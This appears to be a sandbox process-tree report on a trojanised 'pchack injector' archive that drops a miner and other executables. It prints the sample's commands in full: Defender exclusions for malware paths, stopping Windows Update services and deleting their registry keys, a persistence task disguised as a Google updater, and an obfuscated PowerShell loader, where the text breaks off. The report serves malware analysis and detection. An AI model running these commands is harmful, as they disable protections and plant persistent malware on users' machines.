    PID:4788
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1792 --field-trial-handle=1784,i,18280681068726365753,3379226084347356446,131072 /prefetch:2
    3⤵
    PID:3920
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1784,i,18280681068726365753,3379226084347356446,131072 /prefetch:8
    3⤵
    PID:2148
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2244 --field-trial-handle=1784,i,18280681068726365753,3379226084347356446,131072 /prefetch:8
    3⤵
    PID:2604
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3160 --field-trial-handle=1784,i,18280681068726365753,3379226084347356446,131072 /prefetch:1
    3⤵
    PID:2492
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3296 --field-trial-handle=1784,i,18280681068726365753,3379226084347356446,131072 /prefetch:1
    3⤵
    PID:3304
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4516 --field-trial-handle=1784,i,18280681068726365753,3379226084347356446,131072 /prefetch:8
    3⤵
    PID:484
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4628 --field-trial-handle=1784,i,18280681068726365753,3379226084347356446,131072 /prefetch:1
    3⤵
    PID:4640
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4668 --field-trial-handle=1784,i,18280681068726365753,3379226084347356446,131072 /prefetch:8
    3⤵
    PID:3476
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4764 --field-trial-handle=1784,i,18280681068726365753,3379226084347356446,131072 /prefetch:8
    3⤵
    PID:4480
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4772 --field-trial-handle=1784,i,18280681068726365753,3379226084347356446,131072 /prefetch:8
    3⤵
    PID:1456
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4780 --field-trial-handle=1784,i,18280681068726365753,3379226084347356446,131072 /prefetch:1
    3⤵
    PID:4124
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5372 --field-trial-handle=1784,i,18280681068726365753,3379226084347356446,131072 /prefetch:8
    3⤵
    PID:4408
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4820 --field-trial-handle=1784,i,18280681068726365753,3379226084347356446,131072 /prefetch:8
    3⤵
    PID:1508
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5388 --field-trial-handle=1784,i,18280681068726365753,3379226084347356446,131072 /prefetch:1
    3⤵
    PID:2280
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3212 --field-trial-handle=1784,i,18280681068726365753,3379226084347356446,131072 /prefetch:1
    3⤵
    PID:3620
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5572 --field-trial-handle=1784,i,18280681068726365753,3379226084347356446,131072 /prefetch:8
    3⤵
    PID:2828
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5788 --field-trial-handle=1784,i,18280681068726365753,3379226084347356446,131072 /prefetch:8
    3⤵
    PID:1308
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5772 --field-trial-handle=1784,i,18280681068726365753,3379226084347356446,131072 /prefetch:8
    3⤵
    PID:4160
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1660 --field-trial-handle=1784,i,18280681068726365753,3379226084347356446,131072 /prefetch:8
    3⤵
    PID:4580
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5824 --field-trial-handle=1784,i,18280681068726365753,3379226084347356446,131072 /prefetch:8
    3⤵
    PID:4108
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1012 --field-trial-handle=1784,i,18280681068726365753,3379226084347356446,131072 /prefetch:8
    3⤵
    PID:2580
- - C:\Users\Admin\Downloads\winrar-x64-621.exe
    "C:\Users\Admin\Downloads\winrar-x64-621.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Suspicious use of SetWindowsHookEx
    PID:3912
  - - C:\Program Files\WinRAR\uninstall.exe
      "C:\Program Files\WinRAR\uninstall.exe" /setup
      4⤵
      Executes dropped EXE
      Modifies system executable filetype association
      Registers COM server for autorun
      Drops file in Program Files directory
      Modifies registry class
      PID:2224
- C:\Program Files\WinRAR\WinRAR.exe
  "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\Admin\AppData\Local\Temp\Rust_pchack_injector.rar"
  2⤵
  - Executes dropped EXE
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  PID:3808
- C:\Users\Admin\Desktop\injector.exe
  "C:\Users\Admin\Desktop\injector.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:1476
- - C:\OneDriveLocal\updater.exe
    "C:\OneDriveLocal\updater.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    PID:4424
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\comagentwin\kdcHKrIxlEmo.vbe"
      4⤵
      Checks computer location settings
      PID:1216
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\comagentwin\hmEg1nUxiS6WtgTYSmxOz5faQE7mr8.bat" "
        5⤵
        
        PID:3876
      - C:\comagentwin\MssurrogateMonitor.exe
        
        "C:\comagentwin\MssurrogateMonitor.exe"
        6⤵
        Drops file in Drivers directory
        Checks computer location settings
        Executes dropped EXE
        Drops file in Program Files directory
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:4016
        
        C:\comagentwin\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\comagentwin\MssurrogateMonitor.exe'
        7⤵
        
        PID:4272
        
        C:\comagentwin\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\MssurrogateMonitor.exe'
        7⤵
        Executes dropped EXE
        
        PID:404
        
        C:\comagentwin\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\comagentwin\powershell.exe'
        7⤵
        
        PID:3820
        
        C:\comagentwin\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Containers\serviced\spoolsv.exe'
        7⤵
        Executes dropped EXE
        
        PID:2448
        
        C:\comagentwin\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\fontdrvhost.exe'
        7⤵
        Executes dropped EXE
        
        PID:3948
        
        C:\comagentwin\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\dialer.exe'
        7⤵
        Executes dropped EXE
        
        PID:2712
        
        C:\comagentwin\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\MssurrogateMonitor.exe'
        7⤵
        Executes dropped EXE
        
        PID:4056
        
        C:\comagentwin\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Videos\smss.exe'
        7⤵
        Executes dropped EXE
        
        PID:2404
        
        C:\comagentwin\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ServiceProfiles\NetworkService\RuntimeBroker.exe'
        7⤵
        Executes dropped EXE
        
        PID:4164
        
        C:\comagentwin\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\conhost.exe'
        7⤵
        Executes dropped EXE
        
        PID:2784
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\12g28OGv7J.bat"
        7⤵
        
        PID:3920
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:1088
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        8⤵
        
        PID:4284
        
        C:\Windows\Containers\serviced\spoolsv.exe
        
        "C:\Windows\Containers\serviced\spoolsv.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4272
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5b63d857-de7f-4cc9-bf37-82cfb59a6ca7.vbs"
        9⤵
        
        PID:984
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\897b4963-f9a6-4f08-86ad-aee067cd6c2e.vbs"
        9⤵
        
        PID:4948
- - C:\OneDriveLocal\lopataminers.exe
    "C:\OneDriveLocal\lopataminers.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    PID:3620
- - C:\OneDriveLocal\chicka.exe
    "C:\OneDriveLocal\chicka.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    PID:4292
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4364
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:1100
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:3912
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:5016
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:3740
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2404
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:2188
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:4348
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:368
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:3512
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:4176
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:732
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:2940
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:3448
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:2204
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:4236
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:4056
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#bgzsibk#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2264
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:1196
- C:\Users\Admin\Desktop\injector.exe
  "C:\Users\Admin\Desktop\injector.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:564
- - C:\OneDriveLocal\updater.exe
    "C:\OneDriveLocal\updater.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    PID:308
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\comagentwin\kdcHKrIxlEmo.vbe"
      4⤵
      Checks computer location settings
      PID:3980
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\comagentwin\hmEg1nUxiS6WtgTYSmxOz5faQE7mr8.bat" "
        5⤵
        
        PID:4072
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        Suspicious use of SetWindowsHookEx
        
        PID:2508
      - C:\comagentwin\MssurrogateMonitor.exe
        
        "C:\comagentwin\MssurrogateMonitor.exe"
        6⤵
        Executes dropped EXE
        
        PID:5116
- - C:\OneDriveLocal\lopataminers.exe
    "C:\OneDriveLocal\lopataminers.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    PID:3216
- - C:\OneDriveLocal\chicka.exe
    "C:\OneDriveLocal\chicka.exe"
    3⤵
    - Executes dropped EXE
    PID:4620
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:2216
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:228
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#bgzsibk#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  PID:448
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:3764
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:1572
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:2868
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:1596
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:732
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:3024
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:3804
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2276
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4944
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:4340
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:4740
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:4464
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:268
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    PID:5096
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:2764
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:3524
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:2208

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
PID:2880

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2728

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2540

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2472

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2392

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2296

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2044

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1528

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1144
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:NUSXowEmuEqF{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$MSCifHwpggfEcI,[Parameter(Position=1)][Type]$SeDtSGgMHF)$juatRxwMkTd=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+'l'+'ec'+'t'+''+[Char](101)+'d'+'D'+''+[Char](101)+'le'+'g'+''+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+'o'+''+'r'+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+'ul'+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+'s'+','+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+','+''+'S'+''+[Char](101)+'ale'+'d'+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+'i'+''+[Char](67)+''+[Char](108)+''+'a'+'s'+'s'+''+[Char](44)+'Aut'+'o'+''+[Char](67)+''+'l'+'a'+[Char](115)+'s',[MulticastDelegate]);$juatRxwMkTd.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'al'+[Char](78)+''+[Char](97)+''+[Char](109)+''+'e'+''+[Char](44)+''+'H'+''+'i'+'d'+[Char](101)+'By'+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$MSCifHwpggfEcI).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+','+'M'+''+[Char](97)+'na'+'g'+'e'+'d'+'');$juatRxwMkTd.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+'c'+','+[Char](72)+''+'i'+'d'+'e'+'B'+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+'New'+[Char](83)+''+'l'+'o'+'t'+''+','+''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+'u'+'al',$SeDtSGgMHF,$MSCifHwpggfEcI).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+','+[Char](77)+'a'+'n'+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $juatRxwMkTd.CreateType();}$rqZPZBzKBKLqy=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+'s'+'t'+''+[Char](101)+''+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+[Char](99)+'r'+[Char](111)+''+'s'+''+[Char](111)+''+[Char](102)+'t'+[Char](46)+'W'+'i'+''+[Char](110)+''+'3'+'2'+'.'+''+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+'r'+''+'q'+''+[Char](90)+'P'+[Char](90)+''+[Char](66)+''+[Char](122)+''+'K'+'B'+'K'+''+[Char](76)+'q'+'y'+'');$kFLzYFUbuDshCx=$rqZPZBzKBKLqy.GetMethod(''+[Char](107)+'FL'+'z'+''+'Y'+'FU'+[Char](98)+''+[Char](117)+''+[Char](68)+''+'s'+''+'h'+''+[Char](67)+''+'x'+'',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+'ta'+[Char](116)+'ic',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$xQkRezmyYJPnEIQQPnu=NUSXowEmuEqF @([String])([IntPtr]);$DwdwuTHSbyQAIXqOFrltyC=NUSXowEmuEqF 